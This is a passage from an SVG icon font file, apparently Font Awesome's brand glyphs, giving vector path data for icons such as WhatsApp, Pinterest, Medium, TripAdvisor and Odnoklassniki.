d="M640 118.7c0 -65.9004 -52.5 -114.4 -117.5 -114.4c-165.9 0 -196.6 249.7 -359.7 249.7c-146.899 0 -147.1 -212.2 5.60059 -212.2c42.5 0 90.8994 17.7998 125.3 42.5c5.59961 4.10059 16.8994 16.2998 22.7998 16.2998s10.9004 -5 10.9004 -10.8994
c0 -7.7998 -13.1006 -19.1006 -18.7002 -24.1006c-40.9004 -35.5996 -100.3 -61.1992 -154.7 -61.1992c-83.4004 -0.100586 -154 59 -154 144.899c0 85.9004 67.5 149.101 152.8 149.101c185.3 0 222.5 -245.9 361.9 -245.9c99.8994 0 94.7998 139.7 3.39941 139.7
c-17.5 0 -35 -11.6006 -46.8994 -11.6006c-8.40039 0 -15.9004 7.2002 -15.9004 15.6006c0 11.5996 5.2998 23.7002 5.2998 36.2998c0 66.5996 -50.8994 114.7 -116.899 114.7c-53.1006 0 -80 -36.9004 -88.7998 -36.9004c-6.2002 0 -11.2002 5 -11.2002 11.2002
c0 5.59961 4.09961 10.2998 7.7998 14.4004c25.2998 28.7998 64.7002 43.6992 102.8 43.6992c79.4004 0 139.101 -58.3994 139.101 -137.8c0 -6.89941 -0.300781 -13.7002 -1.2002 -20.5996c11.8994 3.09961 24.0996 4.7002 35.8994 4.7002
c60.7002 0 111.9 -45.3008 111.9 -107.2z" />
    <glyph glyph-name="pinterest-p" unicode="&#xf231;" horiz-adv-x="384" 
d="M204 441.5c94.2002 0 180 -64.7998 180 -164.1c0 -93.3008 -47.7002 -196.801 -153.9 -196.801c-25.1992 0 -57 12.6006 -69.2998 36c-22.7998 -90.2998 -21 -103.8 -71.3994 -172.8c-5.2002 -1.89941 -3.5 -2.2998 -6.90039 1.5c-1.7998 18.9004 -4.5 37.5 -4.5 56.4004
c0 61.2002 28.2002 149.7 42 209.1c-7.5 15.2998 -9.59961 33.9004 -9.59961 50.7002c0 80 93.8994 92 93.8994 25.7998c0 -39 -26.3994 -75.5996 -26.3994 -113.399c0 -25.8008 21.2998 -43.8008 46.1992 -43.8008c69 0 90.3008 99.6006 90.3008 152.7
c0 71.1006 -50.4004 109.8 -118.5 109.8c-79.2002 0 -140.4 -57 -140.4 -137.399c0 -38.7002 23.7002 -58.5 23.7002 -67.7998c0 -7.80078 -5.7002 -35.4004 -15.6006 -35.4004c-24 0 -63.5996 40 -63.5996 110.4c0 110.699 101.4 179.1 204 179.1z" />
    <glyph glyph-name="whatsapp" unicode="&#xf232;" 
d="M380.9 350.9c41.8994 -42 67.0996 -97.7002 67.0996 -157c0 -122.4 -101.8 -222 -224.1 -222h-0.100586c-37.2002 0 -73.7002 9.2998 -106.1 27l-117.7 -30.9004l31.5 115c-19.4004 33.7002 -29.5996 71.9004 -29.5996 111c0 122.4 99.5996 222 222 222
c59.2998 0 115.1 -23.0996 157 -65.0996zM223.9 9.2998c101.699 0 186.6 82.7998 186.6 184.601c0.0996094 49.2998 -21.2998 95.5996 -56.0996 130.5c-34.8008 34.8994 -81.1006 54.0996 -130.4 54.0996c-101.8 0 -184.6 -82.7998 -184.6 -184.5
c0 -34.9004 9.69922 -68.7998 28.1992 -98.2002l4.40039 -7l-18.5996 -68.0996l69.7998 18.2998l6.7002 -4c28.2998 -16.7998 60.7998 -25.7002 94 -25.7002zM325.1 147.5c5.5 -2.7002 9.2002 -4.09961 10.5 -6.59961c1.40039 -2.30078 1.40039 -13.4004 -3.19922 -26.4004
c-4.60059 -13 -26.7002 -24.7998 -37.4004 -26.4004c-17.5996 -2.59961 -31.4004 -1.2998 -66.5996 13.9004c-55.7002 24.0996 -92 80.0996 -94.8008 83.7998c-2.69922 3.7002 -22.5996 30.1006 -22.5996 57.4004s14.2998 40.7002 19.4004 46.2998
c5.09961 5.5 11.0996 6.90039 14.7998 6.90039s7.39941 0 10.5996 -0.200195c3.40039 -0.200195 8 1.2998 12.5 -9.5c4.60059 -11.1006 15.7002 -38.4004 17.1006 -41.2002c1.39941 -2.7998 2.2998 -6 0.5 -9.7002c-10.6006 -21.2002 -22 -20.5 -16.3008 -30.2998
c21.5 -36.9004 42.9004 -49.7002 75.5 -66c5.5 -2.7998 8.80078 -2.2998 12 1.40039c3.30078 3.7998 13.9004 16.1992 17.6006 21.7998c3.7002 5.59961 7.39941 4.7002 12.5 2.7998c5.09961 -1.7998 32.3994 -15.2002 37.8994 -18z" />
    <glyph glyph-name="viacoin" unicode="&#xf237;" horiz-adv-x="384" 
d="M384 416l-48 -112h48v-48h-68.5l-13.7998 -32h82.2998v-48h-102.8l-89.2002 -208l-89.2002 208h-102.8v48h82.2998l-13.7998 32h-68.5v48h48l-48 112h64l80.7998 -192h94.5l80.7002 192h64zM192 112l27 64h-54z" />
    <glyph glyph-name="medium" unicode="&#xf23a;" 
d="M0 416h448v-448h-448v448zM372.2 309.9v5h-83.2002l-59.2998 -147.9l-67.4004 148h-87.2998v-5.09961l28.0996 -33.9004c2.80078 -2.5 4.2002 -6.09961 3.80078 -9.7998v-133c0.799805 -4.7998 -0.700195 -9.7002 -4.10059 -13.2002l-31.5996 -38.2998v-5.10059h89.7998
v5.10059l-31.5996 38.2998c-3.40039 3.5 -5.10059 8.40039 -4.40039 13.2002v115l78.7002 -171.601h9.09961l67.6006 171.601v-136.9c0 -3.59961 0 -4.2998 -2.40039 -6.7002l-24.2998 -23.5996v-4.90039h118v5.10059l-23.5 23
c-2.10059 1.5 -3.10059 4.09961 -2.7002 6.7002v169.3c-0.400391 2.5 0.599609 5.09961 2.7002 6.7002z" />
    <glyph glyph-name="y-combinator" unicode="&#xf23b;" 
d="M448 416v-448h-448v448h448zM236 160.5l77.5 145.5h-32.7002l-45.7998 -91c-4.7002 -9.2998 -9 -18.2998 -12.7998 -26.7998l-12.2002 26.7998l-45.2002 91h-35l76.7002 -143.8v-94.5h29.5v92.7998z" />
    <glyph glyph-name="optin-monster" unicode="&#xf23c;" horiz-adv-x="576" 
d="M572.6 26.5996c1 -3.5 1.90039 -7 1.7002 -10.6992c0.799805 -31.6006 -44.2998 -64 -73.5 -65.1006c-17.2998 -0.799805 -34.5996 8.40039 -42.7002 23.5c-113.5 -4.09961 -227 -4.89941 -340.199 0c-8.40039 -15.0996 -25.7002 -24 -43 -23.5
c-28.9004 1.10059 -74 33.5 -73.5 65.1006c0.299805 3.7998 0.799805 7.2998 1.89941 10.7998c-5.59961 9.39941 -4.7998 15.2998 5.40039 11.5996c3.2998 5.2002 7 9.5 11.0996 13.7998c-2.5 10.9004 1.2998 14.1006 11.1006 9.2002c4.5 3.2998 10 6.5 15.8994 9.2002
c0 15.7998 11.7998 11.2002 17.2998 5.7002c12.5 1.7998 20.2002 -0.700195 26.8008 -5.7002v19.7002c-12.9004 0 -40.6006 11.3994 -45.9004 36.2002c-5 20.7998 2.59961 38.0996 25.0996 47.5996c0.800781 5.90039 8.10059 14 14.9004 15.9004
c7.59961 1.89941 12.5 -4.60059 14.0996 -10.3008c7.40039 0 17.8008 -1.5 21.1006 -8.09961c5.39941 0.5 11.0996 1.40039 16.5 1.90039c-2.40039 1.89941 -5.10059 3.5 -8.10059 4.59961c-5.09961 8.90039 -13.7998 11.0996 -24.5996 11.5996
c0 0.800781 0 1.60059 0.299805 2.7002c-19.7998 0.5 -44.0996 5.60059 -54.8994 17.7998c-21.3008 23.6006 -15.9004 83.6006 12.1992 103.5c8.40039 5.7002 21.6006 0.800781 22.7002 -9.69922c2.40039 -20.6006 0.400391 -26.8008 26.2002 -25.9004
c8.09961 7.7998 16.7998 14.5996 26.5 20c-14.9004 1.2998 -28.9004 -1.59961 -43.7998 -3.7998c12.7002 12.5 23.8994 25.3994 56.7002 42.3994c23.5 11.9004 50 20.8008 76.1992 23.2002c-18.5996 7.90039 -40 11.9004 -59.6992 16.5
c76.5 16.2002 174.6 22.1006 244.199 -37.5996c18.1006 -15.4004 32.4004 -36.2002 42.7002 -60c39.7998 -4.90039 36.4004 5.5 38.6006 25.0996c1.09961 10.2998 14.2998 15.4004 22.6992 9.5c14.9004 -10.5 22.2002 -30.7998 24.6006 -48.0996
c2.2002 -17.7998 0.299805 -41.2998 -12.4004 -55.1006c-10.7998 -12.1992 -34.2998 -17.5996 -53.7998 -18.0996v-2.7998c-11.0996 -0.200195 -20.2998 -2.40039 -25.7002 -11.6006c-3 -1.09961 -5.7002 -2.69922 -8.39941 -4.59961
c5.69922 -0.5 11.3994 -1.40039 16.7998 -1.90039c1.89941 5.60059 12.5996 8.40039 21.0996 8.40039c1.7002 5.40039 6.7998 11.9004 14.1006 10.2998c7.2998 -1.59961 14.0996 -10 14.8994 -15.8994c10.7998 -4.40039 22.1006 -12.2002 25.1006 -25.7002
c1.89941 -8.10059 1.69922 -15.1006 0.299805 -21.9004c-5.7002 -25.2002 -33.2998 -36.2002 -45.9004 -36.2002c0 -6.69922 0 -13.1992 -0.299805 -19.6992c8.09961 6 16.4004 7.19922 26.7998 5.69922c6 5.90039 17.6006 9.40039 17.6006 -5.69922
c5.59961 -2.7002 11.2998 -6 15.8994 -9.2002c10.1006 5 13.7002 0.5 10.7998 -9.2002c4.10059 -4.2998 8.10059 -8.90039 11.1006 -13.7998c10.0996 3.59961 11 -2.10059 5.39941 -11.6006zM498.8 280.6c17.2998 -6.69922 26.2002 -22.0996 30.2998 -35.6992
c1.10059 10.5996 -2.69922 39.5 -13.7998 51.0996c-7.2998 7.2998 -14.0996 5.09961 -14.0996 -0.799805c0 -6.2002 -1.2998 -11.6006 -2.40039 -14.6006zM494.2 273.9c-3.2002 -3.30078 -9.2002 -4.90039 -14.1006 -5.7002c13 -15.7002 17 -41.7002 12.7002 -63
c10.7998 2.2002 20.5 6.2998 26.2002 12.2002c1.90039 2.19922 3.7998 4.89941 4.90039 7.59961c-1.10059 21.2998 -10.2002 42.7002 -29.7002 48.9004zM470.1 267.1c-3.69922 0 -8.09961 0 -11.7998 0.300781c7.5 -20.6006 12.4004 -42.7002 14.2998 -64.6006
c3.5 0 7.5 0.299805 11.6006 0.799805c5.89941 24.3008 -0.299805 51.6006 -14.1006 63.5zM47.5 245c4.09961 13.5 13 28.9004 30.2998 35.7002c-1 3 -2.39941 8.39941 -2.39941 14.5996c0 5.90039 -7.10059 8.10059 -14.1006 0.799805
c-11.3994 -11.5996 -14.8994 -40.5996 -13.7998 -51.0996zM57.2002 217.4c5.7002 -6.2002 15.3994 -10 26.2002 -12.2002c-4.30078 21.3994 -0.300781 47.2998 12.6992 63c-4.89941 0.799805 -10.8994 2.5 -14.0996 5.7002
c-19.4004 -6.2002 -28.2998 -27.6006 -29.7002 -48.9004c1.40039 -2.7002 3 -5.40039 4.90039 -7.59961zM105.1 202.8c2.40039 22.2002 9.10059 43.7998 19.8008 63.5c-5.2002 -1.09961 -10 -3 -14.9004 -4.89941l-12.2002 -5.10059v0.299805
c-7.2998 -14.0996 -10 -34.3994 -5.39941 -53c4.59961 -0.5 8.59961 -0.799805 12.6992 -0.799805zM289.1 365.5c-41.8994 0 -76.1992 -34.0996 -76.1992 -75.9004c0 -42.1992 34.2998 -76.1992 76.1992 -76.1992c41.9004 0 76.2002 34 76.2002 76.1992
c0 41.9004 -34.2998 75.9004 -76.2002 75.9004zM404.7 191.2c-12.9004 0.799805 -26.2002 0.799805 -39.5 1.09961c10 -50.5996 3.2998 -64.7002 16.5 -58.0996c16 8.09961 22.7002 39.2002 23 57zM350.7 192.8c-18.9004 0.299805 -38.1006 0.299805 -57 0v0.299805
c-0.299805 -5.19922 0.200195 -38.0996 4.2998 -41.0996c11.0996 -5.40039 39.5 -4.59961 51.0996 -1.09961c5.40039 1.59961 2.40039 37 1.60059 41.8994zM278.3 139c4.60059 2.5 2.40039 45.4004 1.2998 53.7002v0.299805
c-19.3994 -0.299805 -38.5996 -0.299805 -57.7998 -0.799805c-1.89941 -9.2002 -4.59961 -48.9004 1.90039 -51.6006c13 -5.69922 41.5996 -5.09961 54.5996 -1.59961zM171.8 190.1c-5.39941 -19.6992 0.299805 -45.0996 22.2002 -54.8994
c5.40039 -2.5 8.59961 -2.5 9.7002 4.2998c1.89941 8.7002 2.5 36.7998 4.89941 52.2002c-12.1992 -0.200195 -24.5996 -0.799805 -36.7998 -1.60059zM136.4 158.8c2.39941 -3.7002 1.59961 -9.09961 -8 -12.5c43.7998 -47 92.6992 -85.7002 155.899 -106.5
c67.5 19.2002 115.601 60 163.2 107c-11.0996 4.2998 -7.7002 10.2998 -7.2998 11.6006c-8.90039 0.799805 -17.9004 1.89941 -26.5 2.69922c-9.5 -33 -36 -52.8994 -46.7998 -31.5996c-2.7002 5.2002 -3.5 11.7002 -4.60059 16.7998
c-3.7998 -8.39941 -13.2998 -8.09961 -24.5996 -8.89941c-13.2002 -1.10059 -31.6006 -1.30078 -44 3c-3 -12.9004 -11.1006 -12.9004 -26.7998 -14.3008c-14.1006 -1.39941 -48.7002 -4.09961 -54.9004 10.8008c-1.09961 -28.7002 -35.0996 -10 -45.0996 7
c-3.2002 5.69922 -5.40039 11.3994 -7 17.5996c-7.80078 -0.799805 -15.7002 -1.59961 -23.5 -2.7002zM114.8 -13.7002c0.5 2.5 0.799805 5.2002 0.799805 8.2002c-5.69922 23.2002 -18.5996 49.7002 -33.5 54c-22.3994 6.7002 -68.8994 -23.5 -66.1992 -54.5996
c12.6992 -19.5 40 -35.7002 59.1992 -36.5c17.8008 -0.800781 35.9004 11.0996 39.7002 28.8994zM106.1 52.2998c9 -16 15.5 -33.2998 16.7002 -51.8994c33.5 19.3994 69.1006 35.6992 105.9 47c-38.7002 20.5 -68.1006 47.7998 -97.2998 77
c-2.10059 -1.30078 -5.10059 -2.40039 -7.80078 -3.5c-1.59961 -4.90039 8.7002 -5.30078 5.40039 -12.4004c-2.09961 -4.09961 -8.59961 -7.59961 -15.0996 -9.2002c-2.10059 -2.7002 -5.10059 -4.89941 -7.80078 -6.5h-0.299805
c-0.200195 -13.5 -0.200195 -27 0.299805 -40.5zM443.7 -12.2998c-36.7998 21.2998 -74.1006 41.2998 -115.601 53c-13.7998 -6.2002 -27.8994 -11.2998 -42.1992 -15.4004c-2.10059 -0.799805 -2.10059 -0.799805 -4.30078 0
c-11.8994 3.7002 -23.2998 8.10059 -34.8994 13.2002c-40.2002 -11.5996 -77.2998 -29.2002 -112.4 -50.7998h-0.299805v-0.299805c0.299805 0 0.299805 0 0.299805 0.299805c103.2 -4.10059 206.4 -3.5 309.4 0zM454.2 0.0996094c1 14.7002 7.2002 35.8008 16.5 51.7002
l-0.299805 -0.299805c0.5 13.7002 0.799805 27.5 0.799805 41.2998c-3 1.7002 -5.7002 4.10059 -8.10059 6.7998c-6.5 1.30078 -12.8994 5.10059 -15.0996 8.90039c-1.90039 4.09961 1.2998 7.59961 5.90039 10.2998c-0.200195 0.5 -0.5 1.60059 -0.5 2.40039
c-3 0.799805 -5.40039 1.7998 -7.60059 3.2002c-31.5996 -29.4004 -65.3994 -56.7002 -103.5 -76.7002c38.9004 -11.7002 76 -28.1006 111.9 -47.6006zM560.1 -6.09961c3 31.0996 -43.5 61.3994 -66.1992 54.5c-14.6006 -4.30078 -27.8008 -30.8008 -33.5 -54
c0 -23.8008 21.1992 -37.9004 40.5 -37c19.1992 0.799805 46.5 17 59.1992 36.5zM372.9 372.8c-35.7002 39.2002 -81.4004 47.7998 -126 23.5c25.1992 56.2002 122.199 48.6006 126 -23.5zM74.7998 40.9004c14.9004 1.89941 24.6006 -19.2002 18.6006 -30.8008
c-4.80078 -9.69922 -23.7002 -24.0996 -35.9004 -27.2998c-16.5 -4.59961 -32.2002 3.2998 -32.2002 14.9004c0 17.7998 33.7998 41.5996 49.5 43.2002zM290.7 217.1c-30.9004 0 -57.6006 25.7002 -50.2998 59.8008c13.1992 -20.7002 46.5 -12 46.5 11.2998
c0 10 -7 18.5996 -16.5 21.5996c31.6992 13.7998 72.1992 -8.2002 72.1992 -44.2998c0 -26.7998 -23.2998 -48.4004 -51.8994 -48.4004zM68 -26.0996c-0.5 8.39941 20.2998 23.5 29.2002 25.0996c8.59961 1.59961 12.7002 -11.4004 9.7002 -18.4004
c-2.7002 -5.69922 -10.5 -13.5 -17.3008 -16.1992c-9.39941 -3.2002 -21.0996 3 -21.5996 9.5zM501.2 40.9004c15.7002 -1.60059 49.5 -25.4004 49.5 -43.2002c0 -11.7002 -15.7002 -19.5 -32.2002 -14.9004c-12.0996 3.2002 -31.2998 17.6006 -36.2002 27.2998
c-5.7002 11.6006 4 32.7002 18.9004 30.8008zM478.8 -1c8.90039 -1.59961 30 -16.7002 29.1006 -25.0996c-0.200195 -6.5 -12.1006 -12.7002 -21.3008 -9.5c-7 2.69922 -14.8994 10.5 -17.2998 16.1992c-2.89941 7.10059 1.10059 20 9.5 18.4004z" />
    <glyph glyph-name="opencart" unicode="&#xf23d;" horiz-adv-x="639" 
d="M423.3 7.2998c0 -25.2998 -20.2998 -45.5996 -45.5996 -45.5996s-45.7998 20.2998 -45.7998 45.5996s20.5996 45.7998 45.7998 45.7998c25.3994 0 45.5996 -20.5 45.5996 -45.7998zM169.4 53.0996c25.2998 0 45.7998 -20.5 45.7998 -45.7998
s-20.5 -45.5996 -45.7998 -45.5996c-25.3008 0 -45.6006 20.3994 -45.6006 45.5996s20.2998 45.7998 45.6006 45.7998zM461.1 323.1c302.2 0 169.5 -67.1992 -17.1992 -233.899c59.1992 102.8 262.5 193.899 -70.8008 188.899c-319.8 -4.69922 -338.699 92.5 -373.1 144.2
c81.9004 -86.3994 158.9 -99.2002 461.1 -99.2002z" />
    <glyph glyph-name="expeditedssl" unicode="&#xf23e;" horiz-adv-x="496" 
d="M248 404.6c117.4 0 212.6 -95.1992 212.6 -212.6s-95.1992 -212.6 -212.6 -212.6s-212.6 95.1992 -212.6 212.6s95.1992 212.6 212.6 212.6zM150.6 271.7h-0.199219v-26.6006c0 -5 3.89941 -8.89941 8.89941 -8.89941h17.7002c5 0 8.90039 3.89941 8.90039 8.89941
v26.6006c0 82.0996 124 82.0996 124 0v-26.6006c0 -5 3.89941 -8.89941 8.89941 -8.89941h17.7002c5 0 8.90039 3.89941 8.90039 8.89941v26.6006c0 53.7002 -43.7002 97.3994 -97.4004 97.3994s-97.4004 -43.6992 -97.4004 -97.3994zM389.7 68v141.7
c0 9.7002 -8 17.7002 -17.7002 17.7002h-248c-9.7002 0 -17.7002 -8 -17.7002 -17.7002v-141.7c0 -9.7002 8 -17.7002 17.7002 -17.7002h248c9.7002 0 17.7002 8 17.7002 17.7002zM141.7 205.3v-132.899c0 -2.5 -1.90039 -4.40039 -4.40039 -4.40039h-8.89941
c-2.5 0 -4.40039 1.90039 -4.40039 4.40039v132.899c0 2.5 1.90039 4.40039 4.40039 4.40039h8.89941c2.5 0 4.40039 -1.90039 4.40039 -4.40039zM283.4 156.6c0 -13 -7.2002 -24.3994 -17.7002 -30.3994v-31.6006c0 -5 -3.90039 -8.89941 -8.90039 -8.89941h-17.7002
c-5 0 -8.89941 3.89941 -8.89941 8.89941v31.6006c-10.5 6.09961 -17.7002 17.3994 -17.7002 30.3994c0 19.7002 15.7998 35.4004 35.4004 35.4004c19.5996 0 35.5 -15.7998 35.5 -35.4004zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248
s111 248 248 248zM248 -38.2998c127 0 230.3 103.3 230.3 230.3s-103.3 230.3 -230.3 230.3s-230.3 -103.3 -230.3 -230.3s103.3 -230.3 230.3 -230.3z" />
    <glyph glyph-name="cc-jcb" unicode="&#xf24b;" horiz-adv-x="576" 
d="M431.5 203.7v32.2998c41.2002 0 38.5 -0.200195 38.5 -0.200195c7.2998 -1.2998 13.2998 -7.2998 13.2998 -16c0 -8.7998 -6 -14.5 -13.2998 -15.7998c-1.2002 -0.400391 -3.2998 -0.299805 -38.5 -0.299805zM474.3 183.5c7.5 -1.5 13.5 -8.2998 13.5 -17
c0 -9 -6 -15.5 -13.5 -17c-2.7998 -0.700195 -3.2002 -0.5 -42.7998 -0.5v35c39.5 0 40 0.200195 42.7998 -0.5zM576 368v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48zM182 255.7h-57
c0 -67.1006 10.7002 -109.7 -35.7998 -109.7c-19.5 0 -38.7998 5.7002 -57.2002 14.7998v-28c30 -8.2998 68 -8.2998 68 -8.2998c97.9004 0 82 47.7002 82 131.2zM360.5 251.2c-63.4004 16 -165 14.8994 -165 -59.2998c0 -77.1006 108.2 -73.6006 165 -59.2002v28.2998
c-47.5996 -24.7002 -107.5 -22 -107.5 31s59.7998 55.5996 107.5 31.2002v28zM544 161.5c0 18.5 -16.5 30.5 -38 32v0.799805c19.5 2.7002 30.2998 15.5 30.2998 30.2002c0 19 -15.7002 30 -37 31c0 0 6.2998 0.299805 -120.3 0.299805v-127.5h122.7
c24.2998 -0.0996094 42.2998 12.9004 42.2998 33.2002z" />
    <glyph glyph-name="cc-diners-club" unicode="&#xf24c;" horiz-adv-x="576" 
d="M239.7 368.1c97.2002 0 175.8 -78.5996 175.8 -175.8c0 -96.8994 -78.5996 -175.8 -175.8 -175.8c-96.9004 0 -175.8 78.9004 -175.8 175.8c0 97.2002 78.8994 175.8 175.8 175.8zM199.8 88.5v207.9c-41.7002 -16.2002 -71.3994 -56.7002 -71.3994 -104.101
c0 -47.3994 29.6992 -87.8994 71.3994 -103.8zM279.6 88.2002c41.7002 16.2002 71.4004 56.7002 71.4004 104.1c0 47.4004 -29.7002 87.9004 -71.4004 104.101v-208.2zM528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h480zM329.7 0c105 0 200.7 85.5 200.7 190.2c0 114.6 -95.7002 193.8 -200.7 193.8h-90.2998c-106.2 0 -193.801 -79.2002 -193.801 -193.8c0 -104.7 87.6006 -190.2 193.801 -190.2h90.2998z" />
    <glyph glyph-name="creative-commons" unicode="&#xf25e;" horiz-adv-x="496" 
d="M245.83 233.13l-33.2197 -17.2803c-9.43066 19.5801 -25.2402 19.9307 -27.46 19.9307c-22.1309 0 -33.2207 -14.6104 -33.2207 -43.8398c0 -23.5703 9.20996 -43.8408 33.2207 -43.8408c14.4697 0 24.6494 7.09082 30.5693 21.2607l30.5498 -15.5
c-6.16992 -11.5107 -25.6895 -38.9805 -65.0996 -38.9805c-22.5996 0 -73.96 10.3203 -73.96 77.0498c0 58.6904 43 77.0605 72.6299 77.0605c30.7197 0.00976562 52.7002 -11.9502 65.9902 -35.8604zM388.88 233.13l-32.7803 -17.2803
c-9.5 19.7705 -25.7197 19.9307 -27.8994 19.9307c-22.1406 0 -33.2197 -14.6104 -33.2197 -43.8398c0 -23.5508 9.22949 -43.8408 33.2197 -43.8408c14.4502 0 24.6494 7.09082 30.54 21.2607l31 -15.5c-2.10059 -3.75 -21.3906 -38.9805 -65.0898 -38.9805
c-22.6904 0 -73.96 9.87012 -73.96 77.0498c0 58.6699 42.9697 77.0605 72.6299 77.0605c30.71 0.00976562 52.5801 -11.9502 65.5596 -35.8604zM247.56 439.95c141.82 0 248.44 -110.13 248.44 -248c0 -147.13 -118.51 -248 -248.44 -248
c-133.96 0 -247.56 109.51 -247.56 248c0 132.939 104.74 248 247.56 248zM248.43 -10.8604c103.16 0 202.83 81.1299 202.84 202.82c0 113.8 -90.2891 203.26 -202.819 203.26c-118.29 0 -203.72 -97.8496 -203.72 -203.27c0 -109.771 91.1592 -202.811 203.699 -202.811z
" />
    <glyph glyph-name="gg" unicode="&#xf260;" horiz-adv-x="512" 
d="M179.2 217.6l102.399 -102.399l-102.399 -102.4l-179.2 179.2l179.2 179.2l44.7998 -44.7998l-25.5996 -25.6006l-19.2002 19.2002l-128 -128l128 -128l51.5 51.5l-77.1006 76.5zM332.8 371.2l179.2 -179.2l-179.2 -179.2l-44.7998 44.7998l25.5996 25.6006
l19.2002 -19.2002l128 128l-128 128l-51.5 -51.5l77.1006 -76.5l-25.6006 -25.5996l-102.399 102.399z" />
    <glyph glyph-name="gg-circle" unicode="&#xf261;" horiz-adv-x="514" 
d="M257 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM207.5 65.2002l75 75.2002l-77.2002 77.1992l-24.3994 -24.3994l53.0996 -52.9004l-26.5996 -26.5996l-77.2002 77.2002l77.2002 77.1992l11.0996 -11.0996l24.2002 24.2002
l-35.2002 35.3994l-125.7 -125.699zM306.5 67.4004l125.7 125.6l-125.7 125.7l-75 -75l77.2002 -77.2002l24.3994 24.4004l-53.0996 52.8994l26.5 26.5l77.2002 -77.2002l-77.2002 -77.1992l-11.0996 11.0996l-24.1006 -24.4004z" />
    <glyph glyph-name="tripadvisor" unicode="&#xf262;" horiz-adv-x="576" 
d="M166.4 167.479c0 -13.2354 -10.7305 -23.9658 -23.9668 -23.9658c-13.2354 0 -23.9658 10.7305 -23.9658 23.9658c0 13.2363 10.7305 23.9668 23.9658 23.9668c13.2363 0 23.9668 -10.7295 23.9668 -23.9668zM431.362 191.435
c13.2295 0 23.9551 -10.7246 23.9561 -23.9561c0 -13.2305 -10.7266 -23.9551 -23.9561 -23.9551c-13.2314 0 -23.9561 10.7256 -23.9561 23.9551c0 13.2314 10.7256 23.9561 23.9561 23.9561zM520.75 51.9453c-62.667 -49.1045 -153.276 -38.1094 -202.379 24.5586
l-30.9795 -46.3252l-30.6826 45.9395c-48.2773 -60.3906 -135.622 -71.8916 -197.885 -26.0547c-64.0586 47.1572 -77.7588 137.315 -30.6016 201.373c-5.05762 17.1221 -17.7021 42.7236 -28.2227 57.1475l90.2861 0.0498047
c48.0039 29.8701 132.851 54.1123 189.389 54.1123c2.11914 0 5.55762 -0.0371094 7.67578 -0.0820312c1.72363 0.0302734 4.52246 0.0556641 6.24609 0.0556641c55.5518 0 138.851 -23.9258 185.936 -53.4043l96.2178 -0.0742188
c-10.6191 -14.5371 -23.3213 -40.3643 -28.3516 -57.6494c46.793 -62.7471 34.9639 -151.37 -26.6484 -199.646zM259.366 166.239c-0.00683594 63.5566 -51.5352 115.075 -115.092 115.067c-63.5576 -0.00683594 -115.074 -51.5342 -115.068 -115.092
c0.00683594 -63.5566 51.5352 -115.075 115.092 -115.067c63.5127 0.0742188 114.984 51.5381 115.068 115.052v0.0400391zM287.957 176.694c5.43262 73.4395 65.5098 130.884 139.12 133.021c-35.5576 15.374 -95.8555 27.8506 -134.594 27.8506
c-1.41699 0 -3.7168 -0.0166016 -5.13379 -0.0380859c-0.953125 0.00878906 -2.50098 0.0166016 -3.45508 0.0166016c-39.2324 0 -100.479 -12.2168 -136.709 -27.2695c74.3447 -1.58203 135.3 -59.4248 140.771 -133.581zM539.663 205.461
c-21.9922 59.6338 -88.1621 90.1484 -147.795 68.1572c-59.6338 -21.9922 -90.1484 -88.1621 -68.1572 -147.795v-0.0322266c22.0381 -59.6074 88.1982 -90.0908 147.827 -68.1133c59.6152 22.0039 90.1133 88.1621 68.125 147.783zM213.624 167.486v-0.115234
c-0.0566406 -39.3281 -31.9863 -71.1631 -71.3145 -71.1064c-39.3271 0.0576172 -71.1621 31.9863 -71.1055 71.3145s31.9863 71.1631 71.3135 71.1055c39.2598 -0.115234 71.042 -31.9395 71.1064 -71.1982zM189.112 167.486v0.0839844
c-0.0517578 25.7832 -20.9941 46.6445 -46.7783 46.5938s-46.6445 -20.9941 -46.5938 -46.7773c0.0507812 -25.7842 20.9941 -46.6445 46.7764 -46.5938c25.7266 0.113281 46.5371 20.9678 46.5957 46.6934zM502.535 167.486
c-0.0205078 -39.3281 -31.918 -71.2422 -71.2471 -71.2217c-39.3291 0.0214844 -71.1943 31.918 -71.1729 71.2471c0.0195312 39.3281 31.918 71.1943 71.2471 71.1729c39.29 -0.0654297 71.1211 -31.9082 71.1729 -71.1982zM478.031 167.494
c-0.00878906 25.7842 -20.918 46.6787 -46.7021 46.6699s-46.6787 -20.918 -46.6699 -46.7021s20.918 -46.6777 46.7021 -46.6699c25.7646 0.0458984 46.6357 20.9277 46.6699 46.6934v0.00878906z" />
    <glyph glyph-name="odnoklassniki" unicode="&#xf263;" horiz-adv-x="320" 
d="M275.1 114c-27.3994 -17.4004 -65.0996 -24.2998 -90 -26.9004l20.9004 -20.5996l76.2998 -76.2998c27.9004 -28.6006 -17.5 -73.2998 -45.7002 -45.7002c-19.0996 19.4004 -47.0996 47.4004 -76.2998 76.5996l-76.2998 -76.5
c-28.2002 -27.5 -73.5996 17.6006 -45.4004 45.7002c19.4004 19.4004 47.1006 47.4004 76.3008 76.2998l20.5996 20.6006c-24.5996 2.59961 -62.9004 9.09961 -90.5996 26.8994c-32.6006 21 -46.9004 33.3008 -34.3008 59c7.40039 14.6006 27.7002 26.9004 54.6006 5.7002
c0 0 36.2998 -28.8994 94.8994 -28.8994c58.6006 0 94.9004 28.8994 94.9004 28.8994c26.9004 21.1006 47.0996 8.90039 54.5996 -5.7002c12.4004 -25.6992 -1.89941 -38 -34.5 -59.0996zM30.2998 318.3c0 71.7002 58.2998 129.7 129.7 129.7s129.7 -58 129.7 -129.7
c0 -71.3994 -58.2998 -129.399 -129.7 -129.399s-129.7 58 -129.7 129.399zM96.2998 318.3c0 -35.0996 28.6006 -63.7002 63.7002 -63.7002s63.7002 28.6006 63.7002 63.7002c0 35.4004 -28.6006 64 -63.7002 64s-63.7002 -28.5996 -63.7002 -64z" />
    <glyph glyph-name="odnoklassniki-square" unicode="&#xf264;" 
